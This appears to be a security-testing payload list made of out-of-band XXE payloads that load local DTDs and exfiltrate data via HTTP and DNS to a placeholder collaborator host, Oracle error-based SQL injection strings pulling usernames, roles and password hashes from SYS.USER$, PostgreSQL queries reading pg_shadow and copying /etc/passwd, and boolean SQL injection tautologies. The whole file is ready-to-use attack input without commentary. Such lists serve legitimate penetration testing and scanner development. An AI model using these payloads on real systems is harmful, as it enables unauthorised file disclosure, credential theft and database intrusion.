<?xml-stylesheet href="http://xxe-xml-stylesheet.$collabplz/"?><x /> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd"> <!ENTITY % CIMName '> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-1.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\wmi20.dtd"> <!ENTITY % CIMName '> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-2.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///C:\Program Files (x86)\Lotus\Notes\domino.dtd"><!ENTITY % boolean '(aa) #IMPLIED> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-3.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\xwizard.dtd"><!ENTITY % onerrortypes '(aa) #IMPLIED> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-4.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd"><!ENTITY % ISOamsa ' <!ENTITY % file SYSTEM "http://exfil-xxe-payload-5.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; '> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "jar:///usr/local/tomcat/lib/jsp-api.jar!/javax/servlet/jsp/resources/jspxml.dtd"><!ENTITY % URI '(aa) #IMPLIED> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-6.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "jar:///usr/local/tomcat/lib/tomcat-coyote.jar!/org/apache/tomcat/util/modeler/mbeans-descriptors.dtd"> <!ENTITY % Boolean '(aa) #IMPLIED> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-7.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd"> <!ENTITY % url.attribute.set '> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-8.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///opt/IBM/WebSphere/AppServer/properties/sip-app_1_0.dtd"> <!ENTITY % condition 'aaa)> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-9.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ELEMENT aa (bb'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd"> <!ENTITY % constant 'aaa)> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-10.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ELEMENT aa (bb'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/struts/struts-config_1_1.dtd"> <!ENTITY % AttributeName '(aa) #IMPLIED> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-11.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///u01/oracle/wlserver/server/lib/consoleapp/webapp/WEB-INF/struts-config_1_2.dtd"> <!ENTITY % AttributeName '(aa) #IMPLIED> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-12.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/gtksourceview-4/language-specs/language.dtd"> <!ENTITY % itemattrs '> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-13.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/lib/gap/pkg/GAPDoc-1.6.2/bibxmlext.dtd"> <!ENTITY % n.InProceedings 'aaa)> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-14.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ELEMENT aa (bb'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/boostbook/dtd/boostbook.dtd"> <!ENTITY % boost.common.attrib '> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-15.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "jar:///opt/jboss/wildfly/modules/system/layers/base/org/apache/lucene/main/lucene-queryparser-5.5.5.jar!/org/apache/lucene/queryparser/xml/LuceneCoreQuery.dtd"> <!ENTITY % queries 'aaa)> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-16.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ELEMENT aa (bb'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "jar:///opt/jboss/wildfly/modules/system/layers/base/org/apache/xml-resolver/main/xml-resolver-1.2.jar!/org/apache/xml/resolver/etc/catalog.dtd"> <!ENTITY % publicIdentifier '(aa) #IMPLIED> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-17.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/nmap/nmap.dtd"> <!ENTITY % attr_numeric '(aa) #IMPLIED> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-18.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/liteide/liteeditor/kate/language.dtd"> <!ENTITY % commonAttributes '> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-19.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/libgweather/locations.dtd"> <!ENTITY % name 'aaa)> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-20.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ELEMENT aa (bb'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/libgda-5.0/dtd/libgda-server-operation.dtd"> <!ENTITY % paramlist-dtd ' <!ENTITY % file SYSTEM "http://exfil-xxe-payload-21.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; '> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/libgda-5.0/dtd/libgda-paramlist.dtd"> <!ENTITY % array-dtd ' <!ENTITY % file SYSTEM "http://exfil-xxe-payload-22.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; '> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/docutils/docutils.dtd"> <!ENTITY % measure '(aa) #IMPLIED> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-23.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/dblatex/schema/dblatex-config.dtd"> <!ENTITY % attlist.modname '> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-24.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/lib64/erlang/lib/docbuilder-0.9.8.11/dtd/application.dtd"> <!ENTITY % block "xxx" > <!ENTITY % common ' <!ENTITY % file SYSTEM "http://exfil-xxe-payload-25.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; '> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/local/tomcat/lib/servlet-api.jar!/javax/servlet/resources/XMLSchema.dtd"> <!ENTITY % xs-datatypes ' <!ENTITY % file SYSTEM "http://exfil-xxe-payload-26.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; '> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd"> <!ENTITY % CIMName '> <!ENTITY % file "dns-exfil-1"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\wmi20.dtd"> <!ENTITY % CIMName '> <!ENTITY % file "dns-exfil-2"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///C:\Program Files (x86)\Lotus\Notes\domino.dtd"><!ENTITY % boolean '(aa) #IMPLIED> <!ENTITY % file "dns-exfil-3"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\xwizard.dtd"><!ENTITY % onerrortypes '(aa) #IMPLIED> <!ENTITY % file "dns-exfil-4"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd"><!ENTITY % ISOamsa ' <!ENTITY % file "dns-exfil-5"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; '> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "jar:///usr/local/tomcat/lib/jsp-api.jar!/javax/servlet/jsp/resources/jspxml.dtd"><!ENTITY % URI '(aa) #IMPLIED> <!ENTITY % file "dns-exfil-6"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "jar:///usr/local/tomcat/lib/tomcat-coyote.jar!/org/apache/tomcat/util/modeler/mbeans-descriptors.dtd"> <!ENTITY % Boolean '(aa) #IMPLIED> <!ENTITY % file "dns-exfil-7"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd"> <!ENTITY % url.attribute.set '> <!ENTITY % file "dns-exfil-8"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///opt/IBM/WebSphere/AppServer/properties/sip-app_1_0.dtd"> <!ENTITY % condition 'aaa)> <!ENTITY % file "dns-exfil-9"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; <!ELEMENT aa (bb'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd"> <!ENTITY % constant 'aaa)> <!ENTITY % file "dns-exfil-10"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; <!ELEMENT aa (bb'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/struts/struts-config_1_1.dtd"> <!ENTITY % AttributeName '(aa) #IMPLIED> <!ENTITY % file "dns-exfil-11"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///u01/oracle/wlserver/server/lib/consoleapp/webapp/WEB-INF/struts-config_1_2.dtd"> <!ENTITY % AttributeName '(aa) #IMPLIED> <!ENTITY % file "dns-exfil-12"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/gtksourceview-4/language-specs/language.dtd"> <!ENTITY % itemattrs '> <!ENTITY % file "dns-exfil-13"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/lib/gap/pkg/GAPDoc-1.6.2/bibxmlext.dtd"> <!ENTITY % n.InProceedings 'aaa)> <!ENTITY % file "dns-exfil-14"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; <!ELEMENT aa (bb'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/boostbook/dtd/boostbook.dtd"> <!ENTITY % boost.common.attrib '> <!ENTITY % file "dns-exfil-15"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "jar:///opt/jboss/wildfly/modules/system/layers/base/org/apache/lucene/main/lucene-queryparser-5.5.5.jar!/org/apache/lucene/queryparser/xml/LuceneCoreQuery.dtd"> <!ENTITY % queries 'aaa)> <!ENTITY % file "dns-exfil-16"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; <!ELEMENT aa (bb'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "jar:///opt/jboss/wildfly/modules/system/layers/base/org/apache/xml-resolver/main/xml-resolver-1.2.jar!/org/apache/xml/resolver/etc/catalog.dtd"> <!ENTITY % publicIdentifier '(aa) #IMPLIED> <!ENTITY % file "dns-exfil-17"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/nmap/nmap.dtd"> <!ENTITY % attr_numeric '(aa) #IMPLIED> <!ENTITY % file "dns-exfil-18"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/liteide/liteeditor/kate/language.dtd"> <!ENTITY % commonAttributes '> <!ENTITY % file "dns-exfil-19"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/libgweather/locations.dtd"> <!ENTITY % name 'aaa)> <!ENTITY % file "dns-exfil-20"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; <!ELEMENT aa (bb'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/libgda-5.0/dtd/libgda-server-operation.dtd"> <!ENTITY % paramlist-dtd ' <!ENTITY % file "dns-exfil-21"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; '> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/libgda-5.0/dtd/libgda-paramlist.dtd"> <!ENTITY % array-dtd ' <!ENTITY % file "dns-exfil-22"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; '> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/docutils/docutils.dtd"> <!ENTITY % measure '(aa) #IMPLIED> <!ENTITY % file "dns-exfil-23"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/dblatex/schema/dblatex-config.dtd"> <!ENTITY % attlist.modname '> <!ENTITY % file "dns-exfil-24"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/lib64/erlang/lib/docbuilder-0.9.8.11/dtd/application.dtd"> <!ENTITY % block "xxx" > <!ENTITY % common ' <!ENTITY % file "dns-exfil-25"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; '> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/local/tomcat/lib/servlet-api.jar!/javax/servlet/resources/XMLSchema.dtd"> <!ENTITY % xs-datatypes ' <!ENTITY % file "dns-exfil-26"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; '> %local_dtd;]><message></message> | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=4)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=4)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=5)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=5)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=5)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=5)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=5)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=6)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=6)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=6)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=6)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=6)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=7)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=7)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=7)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=7)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=7)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=8)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=8)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=8)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=8)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=8)) AND 'i'='i | |
# Information-disclosure payload fuzz file for PostgreSQL (pgsql) | |
select version(); | |
select current_database(); | |
select current_user; | |
select session_user; | |
select current_setting('log_connections'); | |
select current_setting('log_statement'); | |
select current_setting('port'); | |
select current_setting('password_encryption'); | |
select current_setting('krb_server_keyfile'); | |
select current_setting('virtual_host'); | |
select current_setting('port'); | |
select current_setting('config_file'); | |
select current_setting('hba_file'); | |
select current_setting('data_directory'); | |
select * from pg_shadow; | |
select * from pg_group; | |
create table myfile (input TEXT); | |
copy myfile from '/etc/passwd'; | |
select * from myfile;copy myfile to /tmp/test; | |
OR 1=1 | |
OR 1=0 | |
OR x=x | |
OR x=y | |
OR 1=1# | |
OR 1=0# | |
OR x=x# | |
OR x=y# | |
OR 1=1-- | |
OR 1=0-- | |
OR x=x-- | |
OR x=y-- | |
OR 3409=3409 AND ('pytW' LIKE 'pytW | |
OR 3409=3409 AND ('pytW' LIKE 'pytY | |
